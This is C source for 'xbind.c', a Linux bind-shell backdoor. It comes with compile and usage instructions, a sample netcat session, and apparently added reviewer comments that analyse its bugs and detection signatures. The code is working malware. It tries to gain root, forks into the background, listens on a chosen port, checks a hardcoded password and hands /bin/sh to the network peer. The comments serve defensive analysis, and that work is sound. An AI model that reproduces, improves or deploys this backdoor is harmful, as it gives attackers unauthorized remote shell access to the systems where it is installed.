linux下的后门:xbind.c
/*------------------------------------------------------
xbind.c A bindshell backdoor on linux
c0de by xy7[B.C.T]
Mail:process@cnbct.org
Our te4m:www.cnbct.org
Compile:
gcc -o xbind xbind.c
run now:
./xbind 1985
C:\>nc -vv 192.168.1.52 1985
192.168.1.52: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.1.52] 1985 (?) open
Enert your password: cnbct
Welcome to shell
let's do it:
-------------------------------------------------------*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
/*
 * Fixed strings sent to / expected from the remote peer.
 * Reviewer note: all three are compiled into the binary as plaintext, so
 * they are recoverable with a plain strings scan and can serve as
 * file or network signatures for this sample.
 */
// Password prompt. The misspelling "Enert" is part of the runtime string.
// The explicit "\0" is redundant: main() sends strlen(ENTERPASS) bytes,
// and strlen stops at the first NUL.
#define ENTERPASS "Enert your password: \0"
// Banner written to the peer after the password check passes.
#define WELCOME "Welcome to shell\r\nlet's do it:\r\n"
// Hard-coded shared secret; main() compares it against the first bytes received.
#define PASSWORD "cnbct"
/*
 * Entry point of the bind-shell listener described in the file header.
 *
 * Usage: exactly one argument, the TCP port to listen on (argv[1], parsed
 * with atoi). With any other argument count the usage banner is printed and
 * the process exits with status 1.
 *
 * Flow as written in this function:
 *   1. Try to switch real/effective uid and gid to 0 (results unchecked).
 *   2. fork() and let the original process exit, leaving the child running
 *      in the background.
 *   3. Create a TCP socket, bind it to INADDR_ANY:<port>, listen.
 *   4. accept() one connection, then fork a child that prompts for a
 *      password, compares it with PASSWORD, and on a match redirects
 *      fds 0/1/2 to the socket and executes /bin/sh.
 *
 * Reviewer notes (defensive analysis):
 *   - The password and everything after it cross the network as plaintext
 *     TCP; the prompt and banner are fixed strings.
 *   - On a host, the visible pattern is a process listening on all
 *     interfaces whose child is /bin/sh with stdin/stdout/stderr pointing
 *     at a socket.
 *   - accept() runs once, before the loop, and nothing inside the loop
 *     calls it again. After the first connection the parent branch closes
 *     the descriptor and continues, so the loop keeps forking children that
 *     fail the password check on a closed descriptor and exit(1). Nothing
 *     here waits on them. Expect heavy process-creation noise.
 */
int main(int argc, char **argv)
{
struct sockaddr_in s_addr;
struct sockaddr_in c_addr;
char buf[1024];
pid_t pid;
int i,sock_descriptor,temp_sock_descriptor,c_addrsize;
// Attempt to become root. Return values are ignored, so the program
// continues whether or not these calls succeed. Whether they can succeed
// depends on how the binary is installed and started, which this file
// does not show.
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
// Require exactly one argument (the port); otherwise print usage and quit.
if (argc!=2){
printf("=================================\r\n");
printf("|xbind.c by xy7[B.C.T]\r\n");
printf("|Usage:\r\n");
printf("|./xbind 1985\r\n");
printf("|nc -vv targetIP 1985\r\n");
printf("|enter the password to get shell\r\n");
printf("|Have a nice day;)\r\n");
printf("=================================\r\n");
exit(1);
}
// Background the program: the original process exits immediately and the
// forked child carries on. A failed fork() (-1) is also non-zero, so that
// case exits here as well.
if (fork()){
exit(0);
}
// NOTE(review): socket() is called twice. The first result is stored and
// used below but never checked. The check on the next line tests a second,
// separate socket whose descriptor is neither stored nor closed, so the
// process carries one extra unbound TCP socket for its lifetime.
sock_descriptor=socket(AF_INET,SOCK_STREAM,0);
if (socket(AF_INET,SOCK_STREAM,0)==-1){
printf("socket failed!");
exit(1);
}
memset(&s_addr,0,sizeof(s_addr));
//bzero(&s_addr,sizeof(s_addr));
// Listen on every local interface (INADDR_ANY) at the port from argv[1].
// atoi() performs no validation of the argument.
s_addr.sin_family=AF_INET;
s_addr.sin_addr.s_addr=htonl(INADDR_ANY);
s_addr.sin_port=htons(atoi(argv[1]));
if (bind(sock_descriptor,(struct sockaddr *)&s_addr,sizeof(s_addr))==-1){
printf("bind failed!");
exit(1);
}
if (listen(sock_descriptor,20)==-1)// 20 is the listen backlog (pending-connection queue length), not a cap on connections
{
printf("listen failed!");
exit(1);
}
c_addrsize=sizeof(c_addr);
// Single blocking accept(); its result is not checked for -1.
temp_sock_descriptor=accept(sock_descriptor,(struct sockaddr *)&c_addr,&c_addrsize);
// Per-connection handling. The loop condition only tests that the
// descriptor value is non-zero, and that value is never reassigned inside
// the loop.
while(temp_sock_descriptor){
pid=fork();
if (pid>0) {
// Parent: drop its copy of the client socket and loop again.
close(temp_sock_descriptor);
continue;
}else if (pid==0){
// Child: send the prompt, then read up to 1024 bytes into a zeroed buffer.
// The return values of write() and recv() are not checked.
write(temp_sock_descriptor, ENTERPASS, strlen(ENTERPASS));
memset(buf, '\0', 1024);
recv(temp_sock_descriptor, buf, 1024, 0);
// Only the first 5 bytes are compared, so any input that begins with
// PASSWORD is accepted. On a mismatch the child closes the socket and exits.
if (strncmp(buf,PASSWORD,5) !=0){
close(temp_sock_descriptor);
exit(1);
}
write(temp_sock_descriptor, WELCOME, strlen(WELCOME));
// Point stdin, stdout and stderr at the client socket so the shell started
// below reads from and writes to the network peer.
dup2(temp_sock_descriptor,0);
dup2(temp_sock_descriptor,1);
dup2(temp_sock_descriptor,2);
// On success execl() replaces this process with /bin/sh and does not
// return; the two lines after it run only if the exec fails.
execl("/bin/sh", "sh", (char *) 0);
close(temp_sock_descriptor);
exit(0);
}else{
// fork() failed (pid < 0).
exit(1);
}
}
// Reached only when the loop condition is false, i.e. accept() returned
// descriptor 0.
close(sock_descriptor);
return 0;
}